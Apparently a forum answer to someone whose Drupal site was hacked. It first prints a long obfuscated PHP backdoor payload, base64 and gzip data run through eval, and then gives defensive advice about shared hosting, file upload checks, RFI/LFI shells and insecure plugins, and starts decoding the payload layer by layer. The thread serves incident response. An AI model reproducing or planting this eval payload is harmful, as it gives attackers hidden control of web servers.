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'))); ?><?php eval(gzuncompress(base64_decode('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'))); ?>

First of all, you need to know two things:
This may not be your fault. If its a shared host, the hacker may have compromised any of the other thousand websites on the host, rooted the server, and then attacked your site from within.
Having said that, it may be your fault, so don't relax. Still look for holes.
But, besides looking at the logs, look for vulnerabilities within the sites. Does the site accept user-submitted content? If so, are there file uploads. If so, do you check the file for MIME-Type or just extension.
Another thing is RFI and LFI hacks. These vulnerabilities allow hackers to inject shells into your site, effectively making them administrators with complete file access. Look for these vulnerabilities.
If you can post the code in the .txt files, I'd be happy to "decipher" it for you.
If I can think of anything else, I'll addon.
Edit 1
So, essentially the hacker used base64 and gzcompress to "obfuscate" the code. He then executes the uncompressed code with the eval() function. So, essentially, you can see the first layer of code by removing the eval() function and running the code. Unfortunately, under the first layer, there's another layer which I'm looking at.
In addition, since you say Drupal.... you may be using addons or plugins. Drupal may be secure, but those addons or plugins may not be. Do any of them handle form uploads or files in any way?
Edit 2
First Layer (Submitted by OP).
Second Layer (Initial gzuncompress and base64_decode()).
Still working on it...